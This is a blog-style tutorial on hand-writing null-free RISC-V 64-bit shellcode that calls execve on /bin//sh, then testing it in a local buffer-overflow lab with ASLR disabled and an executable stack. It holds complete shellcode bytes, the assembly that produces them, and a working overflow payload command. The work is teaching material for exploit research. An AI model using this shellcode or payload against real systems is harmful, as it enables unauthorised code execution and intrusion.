In this post I’m going to summarise some relevant background about the RISC-V architecture and Linux syscalls, then show how shellcode can be written and assembled using the GNU toolchain. As you will see, the output machine code has some null bytes in it so I’ll point out where they’re coming from and iterate through a couple of versions to remove them. I’m just making this up as I go so look out for better techniques.
Real hardware is still difficult and expensive to obtain so I’ve been using a qemu virtual machine running the unfinished Debian RISC-V port. The setup process is moderately involved but fully documented on the Debian wiki. While RISC-V supports a number of configurations it appears that 64-bit little-endian (RV64) will be the standard one for general purpose computing.
For getting started with shellcoding here is the key background information:
- In the base standard, instructions are always 32 bits and must be 32-bit-aligned in memory.
- Some architectural features are optional extensions. One to be aware of is the Compressed “C” extension, which allows some instructions to shrink to 16 bits, mixed in with 32 bit ones. Instruction alignment is relaxed to 16-bit boundaries.
- qemu’s emulated CPU has the C extension and the assembler will produce a mixture of 16 and 32 bit instructions. I suspect that this support will be common in real CPUs for size and performance reasons.
- There are 32 integer registers, 64 bits in width, named
x31. The program counter
pcis separate and cannot be directly referenced. They are given alternative names like
sp(stack pointer) and so on, to encourage consistent usage.
zero) always contains 0.
- System calls are invoked using the
ecallinstruction, which has no parameters. The syscall number is taken from register
a7and the arguments from
- Each individual instruction is stored little-endian in memory.
objdumpdisplays them big-endian, which is how they are documented in the ISA manual, so be careful.
- There are no stack-manipulating instructions like x86’s
pop. Return addresses are stored in a “link register” of your choice. Pushes and pops are just loads and stores relative to
s0, the frame pointer).
If in doubt refer to the User-Level ISA on the RISC-V website. It’s suprisingly readable and explains some of the design motivations too.
It’s relatively easy to install a riscv64 cross-compiler on Debian but it’s more interesting to run the full VM so I can test my code. I was able to install a native toolchain inside the VM with apt so that’s what I’m using. The list of extensions appears in
cpuinfo below (“c” for compressed).
root@riscv64:~# uname -a Linux riscv64 4.15.0-00048-gfe92d7905c6e-dirty #1 SMP Wed Aug 22 18:43:55 AEST 2018 riscv64 GNU/Linux root@riscv64:~# cat /proc/cpuinfo hart : 0 isa : rv64imafdcsu mmu : sv48 root@riscv64:~# gcc -v Using built-in specs. COLLECT_GCC=gcc COLLECT_LTO_WRAPPER=/usr/lib/gcc/riscv64-linux-gnu/8/lto-wrapper Target: riscv64-linux-gnu ...
Let’s go ahead and assemble some basic shellcode. It should launch
/bin/sh using the
execve() syscall. According to
/usr/include/asm-generic/unistd.h that’s syscall number 221. I’m going to be sloppy and set both the
envp arguments (
a2) to null. I just need a pointer to the path in
a0. I create
.global _start .text _start: li s1, 0x68732f2f6e69622f # Load "/bin//sh" backwards into s1 sd s1, -16(sp) # Store dword s1 on the stack sd zero, -8(sp) # Store dword zero after to terminate addi a0,sp,-16 # a0 = filename = sp + (-16) slt a1,zero,-1 # a1 = argv set to 0 slt a2,zero,-1 # a2 = envp set to 0 li a7, 221 # execve = 221 ecall # Do syscall
I’ve already done a couple of basic things to avoid nulls in the output.
slt (set if less than) is a tidy way to load zero into a register. I also place my data just below
sp instead of just above because small positive offsets tend to have lots of zeroes in them.
Assemble it into an executable:
$ gcc execve.s -c $ ld execve.o -o execve
As hoped, this runs
tk@riscv64:~$ ./execve $
$ strace ./execve execve("./execve", ["./execve"], 0x3ffffff6d0 /* 16 vars */) = 0 execve("/bin//sh", NULL, NULL) = 0 ...
Now let’s have a look at how this is actually assembled.
$ objdump -d execve ... 0000000000010078 <_start>: 10078: 0343a4b7 lui s1,0x343a 1007c: 9794849b addiw s1,s1,-1671 10080: 00c49493 slli s1,s1,0xc 10084: 7b748493 addi s1,s1,1975 10088: 00c49493 slli s1,s1,0xc 1008c: 34b48493 addi s1,s1,843 10090: 00d49493 slli s1,s1,0xd 10094: 22f48493 addi s1,s1,559 10098: fe913823 sd s1,-16(sp) 1009c: fe013c23 sd zero,-8(sp) 100a0: ff010513 addi a0,sp,-16 100a4: fff02593 slti a1,zero,-1 100a8: fff02613 slti a2,zero,-1 100ac: 0dd00893 li a7,221 100b0: 00000073 ecall
That’s way more instructions than we ever typed. The reason is
li is one of several pseudo-instructions. Since it’s impossible to load an immediate 64-bit value with a 32-bit instruction it automatically splits it into a series of
slli (shift logical left) instructions.
We have quite a few null bytes in that auto-generated instruction sequence. In fact,
slli instructions by definition start with seven 0 bits followed by 5 bits of shift-amount. How annoying. There is a way out though: remember the compressed instructions? There is a compressed version (
C.SLLI in the ISA manual) which isn’t full of zeroes.
Let’s replace the
li s1, 0x68732f2f6e69622f in our source code with the auto-generated instructions in
.global _start .text _start: lui s1,0x343a addiw s1,s1,-1671 slli s1,s1,0xc addi s1,s1,1975 slli s1,s1,0xc addi s1,s1,843 slli s1,s1,0xd addi s1,s1,559 sd s1, -16(sp) # Store it on the stack sd zero, -8(sp) # Store a zero after to terminate addi a0,sp,-16 # a0 = sp + (-16) slt a1,zero,-1 # a1 set to 0 because 0 > -1 slt a2,zero,-1 # Ditto for a2 li a7, 221 # execve = 221 ecall # Do syscall
This is the disassembly after reassembling:
$ gcc execve.s -c; ld execve.o -o execve $ objdump -d execve ... 0000000000010078 <_start>: 10078: 0343a4b7 lui s1,0x343a 1007c: 9794849b addiw s1,s1,-1671 10080: 04b2 slli s1,s1,0xc 10082: 7b748493 addi s1,s1,1975 10086: 04b2 slli s1,s1,0xc 10088: 34b48493 addi s1,s1,843 1008c: 04b6 slli s1,s1,0xd 1008e: 22f48493 addi s1,s1,559 10092: fe913823 sd s1,-16(sp) 10096: fe013c23 sd zero,-8(sp) 1009a: ff010513 addi a0,sp,-16 1009e: fff02593 slti a1,zero,-1 100a2: fff02613 slti a2,zero,-1 100a6: 0dd00893 li a7,221 100aa: 00000073 ecall
Now those nulls are gone. What happened? It seems that the
li pseudo-instruction will produce 32-bit
slli instructions even if the C extension is available. I guess this is a missing optimisation. If we include the
slli instructions directly in the source then it correctly optimises them down to the 16-bit format, which is both smaller and has no nulls.
I want to point out the second-last instruction
li a7,221. It’s interesting that
objdump has displayed this as the pseudo-instruction. In reality this is
addi a7,zero,221. Adding a value to the zero register is merely a convenient way to load a small immediate value to a register. For certain immediate values this will create a null byte in the shellcode (it’s okay here with 221 = 0x0dd). One possible solution is to null out a higher register like
x31 (whose index is all 1s) and then do
Finally we come to
ecall. This mnemonic only exists as a 32-bit instruction and must appear exactly as
0x00000073. This was was easier to deal with in MIPS—the
syscall opcode has a numeric parameter so it’s common to see shellcode that fills it with a dummy value like 0x40404. In RISC-V we have no such luck. We have the usual sorts of workarounds—find a vulnerability where nulls are not a badchar, jump to an
ecall at a known address, encode the shellcode, or take advantage of the little-endian ordering and try to finish our buffer with 0x73, knowing that there will be three 0x00 chars after it.
For this example let’s assume we have an executable stack. We can generate an
-4(sp) and jump to it. Replace the
ecall with the following:
# the 8 bytes below sp are already 0 addi a3,zero,0x73 # Assign 0x73 to a3 sb a3, -4(sp) # Store single byte at sp-4 addi a3,sp,-2 # a3 = sp - 2 jr -2(a3) # jump to a3 - 2
To avoid nulls, the
jr needs to have a small negative offset and I also need to use a higher register than
sp. Here I’ve chosen to use
a3. I need to get the stack pointer value into
a3, but again I need to use a small negative offset in the
addi to avoid nulls. I “share” the required offset of -4 across the two instructions so they both get a small negative.
This time it must be compiled with an executable stack. Otherwise the program will segfault on the jump.
$ gcc execve.s -c; ld execve.o -o execve -z execstack
The final disassembly with no nulls:
00000000000100b0 <_start>: 100b0: 0343a4b7 lui s1,0x343a 100b4: 9794849b addiw s1,s1,-1671 100b8: 04b2 slli s1,s1,0xc 100ba: 7b748493 addi s1,s1,1975 100be: 04b2 slli s1,s1,0xc 100c0: 34b48493 addi s1,s1,843 100c4: 04b6 slli s1,s1,0xd 100c6: 22f48493 addi s1,s1,559 100ca: fe913823 sd s1,-16(sp) 100ce: fe013c23 sd zero,-8(sp) 100d2: ff010513 addi a0,sp,-16 100d6: fff02593 slti a1,zero,-1 100da: fff02613 slti a2,zero,-1 100de: 0dd00893 li a7,221 100e2: 07300693 li a3,115 100e6: fed10e23 sb a3,-4(sp) 100ea: ffe10693 addi a3,sp,-2 100ee: ffe68067 jr -2(a3)
Let’s see the bytes in the order we actually need to provide them in our buffer.
$ objcopy -O binary --only-section=.text execve execve.text $ od -t x1 execve.text 0000000 b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04 0000020 93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c 0000040 01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08 0000060 d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80 0000100 e6 ff 0000102
Notice that all of the instructions are in reverse order. To try it out, let’s set up an embarrassingly vulnerable test environment with a buffer overflow. First disable ASLR so our stack is predictable:
# echo 0 > /proc/sys/kernel/randomize_va_space
Now create a program
We will need to compile this with an executable stack also.
$ gcc vuln.c -z execstack -o vuln $ ./vuln hello Location of buffer: 0x3ffffff4c0 Location of main: 0x2aaaaaa76a Input len: 5
I won’t go into detail here but if you look at
objdump -d vuln you can work out that inside
do_vuln() the return address is stored at
152(sp) and the buffer is at
[shellcode][AAAAA...padding to total len 136 bytes][ret address overwrite] ^ buffer
In practice the location of
buffer depends on the size of the arguments on the stack so it takes a bit of trial and error but it does work:
tk@riscv64:~$ ./vuln `python -c 'b = "\xb7\xa4\x43\x03\x9b\x84\x94\x97\xb2\x04\x93\x84\x74\x7b\xb2\x04\x93\x84\xb4\x34\xb6\x04\x93\x84\xf4\x22\x23\x38\x91\xfe\x23\x3c\x01\xfe\x13\x05\x01\xff\x93\x25\xf0\xff\x13\x26\xf0\xff\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xfe\x93\x06\xe1\xff\x67\x80\xe6\xff"; b += "A"*(136-len(b)); b += "\x40\xf4\xff\xff\x3f"; print b'` Location of buffer: 0x3ffffff440 Location of main: 0x2aaaaaa76a Input len: 141 $
.global _start .text _start: lui s1,0x343a # Load "/bin//sh" into s1 addiw s1,s1,-1671 slli s1,s1,0xc addi s1,s1,1975 slli s1,s1,0xc addi s1,s1,843 slli s1,s1,0xd addi s1,s1,559 sd s1, -16(sp) # Store it on the stack sd zero, -8(sp) # Store a zero after to terminate addi a0,sp,-16 # a0 = sp + (-16) slt a1,zero,-1 # a1 set to 0 because 0 > -1 slt a2,zero,-1 # Ditto for a2 li a7, 221 # execve = 221 addi a3,zero,0x73 # Create ecall instruction at -4(sp) sb a3, -4(sp) addi a3,sp,-2 # Dodge nulls in instructions jr -2(a3) # Jump to -4(sp)